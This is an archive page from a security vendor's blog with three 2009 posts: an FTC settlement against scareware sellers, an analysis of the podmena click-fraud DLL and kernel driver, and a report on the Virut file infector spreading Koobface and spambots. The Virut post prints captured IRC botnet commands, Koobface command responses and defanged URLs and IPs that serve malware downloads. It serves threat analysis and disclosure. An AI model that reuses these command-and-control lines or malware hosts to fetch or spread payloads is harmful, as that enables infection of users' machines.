Archive for the ‘Adware’ Category

« Older Entries

FakeAv Settlement

Thursday, July 2nd, 2009

The Ftc recently settled against a FakeAv purveyor. While this settlement won’t remove all of the variants out there, it is welcome news nonetheless with ongoing progress and the caselist here. The fewer distributors of XP Antivirus the better: “The two settling defendants were part of a massive deceptive advertising scheme that tricked more than a million consumers into buying “rogue” computer security products, including WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus, according to the FTC’s complaint.” ThreatFire users were protected from a number of these scareware software packages, including XP Antivirus, in high volumes within the community back in mid-2008 and earlier.

The FTC’s complaint from December calls this stuff scareware, also called “rogueware”. It’s amazing how many users really fell for and continue to fall for this stuff, and then cannot get their money back. According to the complaint:
“Unaware of the Defendants’ trickery, more than one million consumers have purchased the Defendants’ software products to cure their computers of the non-existent problems “detected” by the Defendants’ fake scans…
Although some consumers later realize they have been defrauded by Defendants and attempt to seek refunds, Defendants routinely delay, obstruct and refuse to honor such requests.”

Posted in Adware, FakeAlert, Rogueware, Social Engineering, cybercrime | No Comments »

Podmena, podmena.dll and podmena.sys = spoof, spoof.dll, spoof.sys

Thursday, June 18th, 2009

We have been investigating and analyzing a variety of malicious components delivered from some recent downloaders. Some of the filenames stand out as unusual. In particular, “podmena”,
which translates from russian to english as “Substitution or replacement made in a covert way (”pod” – “sub” or “under”, sort of under cover; “mena” – the root of word exchange); thus, it often stands for “spoof”, “fake”, etc. “Spoof”. It is fitting.

The two “podmena” files dropped by the phony codec/viewer installs seem to be gathering much interest and gaining prevalence. They’ll be discussed here and the post itself will be updated with new information as it is uncovered.

First off, the files are dropped as one of the may payloads during the phony codec downloader attacks described in previous posts here, here and here. The components seem to be a part of a click fraud scheme and a way to generate potentially artificial traffic volume to several search engines, including bee-find.com, missngpage.com, 102.123bounce.com, and www.search.pro.

Podmena.dll gets registered as a ServiceDll to be run via svchost.exe -k podmena.dll.
Podmena.sys is installed as a kernel driver to run at startup and attaches to \Device\Tcp, intercepting all tcp related IRPs.

The Dll upon startup sends a DeviceIoControl() request to the driver opened on \\.\podmena\. The initial IO control code tells the driver to monitor outbound tcp port 80, and redirect all packets to 127.0.0.1:8085. Then, the dll sends a second io control code to the driver, which activates the forwarding.

The Dll will create a bound listening port on 8085 which now acts as an HTTP proxy for all outbout port 80 traffic. Upon packet reception (after it is redirected by the driver), the Dll will scan the requested url for search keywords based on the domain name of the request. (ie: search.yahoo, google, youtube, yahooapis, metacafe, sugg.search, aolcdn, etc)

When a keyword is found, it will submit the text to its parent controller (the binaries that we have seen hard code “zz-dn.com”, which is unavailable, and then falls back to 85.13.236.134, an ip hosted in London). Depending on some timing randomization, the Dll will then load up and send the web browser to urls based on the response it receives back from this parent controller.

In our lab, subsequent requests were sent to a variety of sites, with all of these sites hosting a variety of ads, even without visiting a search engine. The svchost process loaded up with podmena.dll can visit hundreds of sites approximately every ten minutes, depending on the instruction response it receives.

Oddly, we have not seen higher target moneymakers like banking userid’s and passwords stolen by these components.

Posted in Adware, Click Fraud | No Comments »

Virut Distributing Koobface, Ad-Clickers and Spambots

Tuesday, May 26th, 2009

Virut is a nasty file infector that has been actively updated and distributed for a few years. Yes, you read that correctly. Actively updated and distributed for a few years now. A system infected with this stuff often needs to be reformatted altogether. ThreatFire has been doing its part (for the past couple of years) to prevent the new variants on users’ systems even when the traditional Av scanners have failed to keep up.

Are viruses the thing of yesteryear? Not at all. Is it another 29A, another group of kids looking for some thrills and recognition of their virus writing skills? No. What we find is that the hosting server, the downloads, and the multiple layers of effort are well orchestrated and financially motivated.

The family uses all sorts of tricks to distribute itself and many other components. Much has already been written on its changing infection, encryption, memory residence, injection, html file appending, and hooking techniques. But what is the group behind it up to now?
This summary will put together a few more key points on the threat’s current activity and its hosts. The threat itself comes from a number of servers and delivers a variety of malware. We’ll see that it is responsible for far more than infected files and Irc traffic, including adware, rootkits, password stealers, worms and spambots.

Virut’s current strain of executable infector is highly prevalent. The ThreatFire community has prevented tens of thousands of a couple of the newest Virut variants over the past couple of months. In fact, this executable infector is redeveloped quickly and often, and has been known to be buggy so that disinfection routines by the major Av vendors may end up corrupting the executable files that are meant to be cleaned when detected.

DO NOT VISIT THE MALICIOUS WEBSITES DESCRIBED HERE…

The first server that the current active Virut variant attempts to connect with is irc.zief.pl, oddly enough, over port 80 for its IRC session. It joins one of the channels there to receive private messages instructing it to download more malware:

NICK xxx
USER xxx. . :#xxx Service Pack 3
JOIN #.xxx

:u. PRIVMSG xxx:!get hxxp://cock.8866. org:88/files/adx.gif (Spyware downloader)
:u. PRIVMSG xxx:!get hxxp://dl.guarddog2009. com/cw.exe (Koobface variant)
:u. PRIVMSG xxx:!get hxxp://goasi. cn/ex/a.php (serves “load.exe” malicious downloader)
:u. PRIVMSG xxx:!get hxxp://85.114.131. 69/ad2.exe (malicious ad-popper)
PING :l.
PONG :l.
PING :l.
PONG :l.

Of those domains, it is interesting that the “dl.guarddog2009.com” is actively serving Koobface worm variants and ad popupers, considering that they are peddling scareware/rogueware from the same ip. Avoid it:

Once running, these additional pieces of malware download other nastiness in the background:
hxxp://avhtm.8866. org/files/av.htm (spambot dropper)
a POST is sent to main15052009. com/achcheck.php
hxxp://74.52.164. 210/pk/bb021908.exe (malicious downloader)

another POST is sent up to main15052009. com/ld/gen.php, with a recognizable Koobface response:
#PID=xxx
START|hxxp://www.i-site. ph/1/6244.exe (Bho dropper)
START|hxxp://www.i-site. ph/1/nfr.exe (proxy component)
WAIT|120
#BLACKLABEL
EXIT

hxxp://ji-u. cn/506.exe <-- hxxp://goasi. cn/dll/abb.txt (renamed to reader_s.exe and run, an updated Virut backdoor variant)

An unusual user-agent rears its head:
GET /ad2.exe HTTP/1.0 (malicious ad-popper listed above)
User-Agent: Download
Host: 85.114.131.69
Pragma: no-cache
(Incidentally, 85.114.131.69 is the host to s2.zief. pl and dl.guarddog2009. com.)

Additional files downloaded:
hxxp://ipkipk.3322. org/ipk.exe (downloader/adclick component)
hxxp://xz.wanggui. com/mem322.exe (downloader for password stealers)
hxxp://www.dofulfill . net/loadersvc.exe

All the while, in the background, multiple phantom queries are sent out to multiple servers, in an effort to increase click traffic at various sites, including job sites.

And then comes the spam. Infected machines spew spam containing messages like
“If you don’t feel like a complete person because you can’t afford luxury things to look stylish and elegant, you can forget about this feeling. We offer you fantastic deals on fantastic watches.”
A link is included that takes you to a “group” at a major provider, where knockoff watches and bags appear to be for sale. A click on an image redirects the user to sites like “trylamp. com”. Often, other pieces of spam carry offers for pills of all kinds.

Posted in Adware, Koobface, Rootkit, Spam, Virut | No Comments »

« Older Entries